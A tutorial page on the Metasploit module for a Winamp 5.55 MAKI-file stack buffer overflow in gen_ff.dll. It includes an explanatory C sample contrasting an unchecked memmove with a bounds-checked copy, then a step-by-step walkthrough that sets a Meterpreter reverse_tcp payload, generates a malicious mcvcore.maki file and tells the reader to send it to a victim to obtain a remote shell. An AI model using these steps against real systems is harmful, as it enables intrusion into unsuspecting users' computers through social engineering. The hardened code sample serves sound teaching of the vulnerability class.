This module exploits a stack-based buffer overflow in Winamp 5.55. The flaw exists in gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user-controlled data. To exploit the vulnerability the attacker must convince the victim to install the generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
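To make the vulnerability class concrete, the following is an added illustration and is not the gen_ff.dll code or the Metasploit module's code. It models the pattern the description names: a length field read from an attacker-supplied file is handed to memmove without being compared to the size of the destination buffer. The record layout (a 4-byte little-endian length followed by payload bytes), the buffer sizes and the sample records are all constructed for the example; the real MAKI layout is not described on this page. The hardened copy shows the check that prevents the overflow.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Destination buffer size for the example (constructed value). */
#define DEST_SIZE 16

/* Read a little-endian 32-bit length from the start of a record. */
static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* VULNERABLE pattern (illustrative, not the real gen_ff.dll code):
 * the length comes straight from the file and is passed to memmove
 * without being compared to the destination size. A length larger
 * than DEST_SIZE writes past the end of dest, which lives on the
 * caller's stack. Only ever call this with a well-formed record. */
static int copy_record_vulnerable(const uint8_t *rec, size_t rec_len,
                                  uint8_t *dest) {
    if (rec_len < 4) return -1;
    uint32_t len = read_le32(rec);
    memmove(dest, rec + 4, len);   /* no bounds check on len */
    return (int)len;
}

/* HARDENED pattern: validate the file-supplied length against both the
 * destination capacity and the bytes actually remaining in the input
 * before copying. Returns the number of bytes copied, or -1 on reject. */
static int copy_record_hardened(const uint8_t *rec, size_t rec_len,
                                uint8_t *dest, size_t dest_size) {
    if (rec_len < 4) return -1;
    uint32_t len = read_le32(rec);
    if (len > dest_size) return -1;      /* would overflow dest */
    if (len > rec_len - 4) return -1;    /* record truncated: would over-read input */
    memmove(dest, rec + 4, len);
    return (int)len;
}

/* Constructed sample records (not real MAKI data). */
static const uint8_t good_rec[] = {0x05, 0x00, 0x00, 0x00, 'h', 'e', 'l', 'l', 'o'};
/* Claims a 65535-byte payload while carrying only four bytes. */
static const uint8_t bad_rec[]  = {0xFF, 0xFF, 0x00, 0x00, 'A', 'A', 'A', 'A'};

int main(void) {
    uint8_t buf[DEST_SIZE];
    printf("hardened, good record: %d bytes\n",
           copy_record_hardened(good_rec, sizeof good_rec, buf, DEST_SIZE));
    printf("hardened, bad record:  %d (rejected)\n",
           copy_record_hardened(bad_rec, sizeof bad_rec, buf, DEST_SIZE));
    /* The vulnerable copy is only exercised with the well-formed record;
     * feeding it bad_rec would corrupt the stack. */
    printf("vulnerable, good record: %d bytes\n",
           copy_record_vulnerable(good_rec, sizeof good_rec, buf));
    return 0;
}
```

The check against `dest_size` is what stops the stack overflow; the check against `rec_len - 4` closes the companion over-read. Both are needed whenever a length taken from file content drives a memmove.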
Attacker: Backtrack 5
Victim PC: Windows 7
Open a Backtrack terminal and type msfconsole.
Now type use exploit/windows/fileformat/winamp_maki_bof
msf exploit(winamp_maki_bof) > set payload windows/meterpreter/reverse_tcp
msf exploit(winamp_maki_bof) > set lhost 192.168.1.3 (IP of local host)
msf exploit(winamp_maki_bof) > exploit
After the module successfully generates the malicious mcvcore.maki file, it is stored on your local computer (Metasploit prints the path in the console).
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
Now send your mcvcore.maki file to the victim; as soon as they download and open it, you get a Meterpreter shell on the victim's computer.